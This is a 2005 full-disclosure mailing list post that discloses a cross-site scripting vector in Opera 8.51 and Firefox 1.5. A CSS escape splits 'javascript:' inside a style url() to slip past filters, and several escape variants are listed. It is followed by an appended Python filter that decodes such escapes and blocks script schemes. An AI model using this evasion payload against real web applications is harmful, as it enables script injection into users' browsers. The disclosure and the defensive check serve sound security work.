Date: Fri Dec 2 16:16:22 2005
From: st4rdust at gmail.com (hoshikuzu stardust)
Subject: Opera/8.51 Firefox/1.5 XSS attacking vector

Hello full-disclosure.

Sample:

<anytag style="background:url("javascri\Dpt:/*/**/(function a() {alert('JavaScript is executed.')})();");" />

Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`.
( Tested on Windows XP Service Pack 2. )

Variant:
"\d" "\D" "\0d" "\00000d" "\d " "\00000d " "\a" "\9" etc.

(Maybe we must check out \7 via IE on Mac (a.k.a. BELL on Mac); I do not have a Mac.)

If your web application does not sanitize output it is very easy to inject malicious scripts.

Is it well-known information? Sorry.

BEST REGARDS.

--
hoshikuzu | star_dust
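
A defensive check for the vector in the message above, added here as an example (not part of the original post and not any browser's or library's own code): it decodes CSS escape sequences and drops control characters before looking for a script scheme inside url(...), which a plain substring filter misses. The function names, the deny-list and the test inputs built around the post's variants are assumptions of this example.

```python
import re

# CSS escape: backslash + 1-6 hex digits + one optional whitespace character,
# or backslash + any other single character (taken literally).
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?|\\([^\r\n\f])")
# Removed before the scheme comparison: C0 controls, space and DEL. This is
# deliberately broader than what any one browser strips (CR, LF, TAB, BELL, ...).
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")
# Assumed deny-list for this example; an allow-list of schemes is stricter.
BLOCKED_SCHEMES = ("javascript:", "vbscript:")
_URL_SCHEME = re.compile(
    r"url\([\"']?(" + "|".join(re.escape(s) for s in BLOCKED_SCHEMES) + ")"
)

def decode_css_escapes(css):
    """Replace CSS escape sequences with the characters they denote."""
    def repl(match):
        if match.group(1) is None:
            return match.group(2)                  # e.g. "\:" -> ":"
        cp = int(match.group(1), 16)
        if cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
            return "\ufffd"                        # not a valid scalar value
        return chr(cp)
    return _CSS_ESCAPE.sub(repl, css)

def normalize_style(css):
    """Decode escapes, drop control/whitespace characters, lowercase."""
    return _CTRL_WS.sub("", decode_css_escapes(css)).lower()

def blocked_scheme_in_style(css):
    """Return the blocked scheme used inside url(...), or None."""
    match = _URL_SCHEME.search(normalize_style(css))
    return match.group(1) if match else None

# Constructed inputs: the style value from the post, then the escape variants
# it lists plus the \7 it mentions as untested.
SAMPLE = r"""background:url("javascri\Dpt:/*/**/(function a() {alert('JavaScript is executed.')})();");"""
VARIANTS = [r"\d", r"\D", r"\0d", r"\00000d", r"\d ", r"\00000d ", r"\a", r"\9", r"\7"]

if __name__ == "__main__":
    print("naive substring match:", "javascript:" in SAMPLE.lower())
    print("after normalization:  ", blocked_scheme_in_style(SAMPLE))
    for v in VARIANTS:
        css = 'background:url("javascri' + v + 'pt:void(0)")'
        print(repr(v), "->", blocked_scheme_in_style(css))
```

Stripping every control character over-blocks compared with what a given browser actually ignores, which is the safe direction for an output filter.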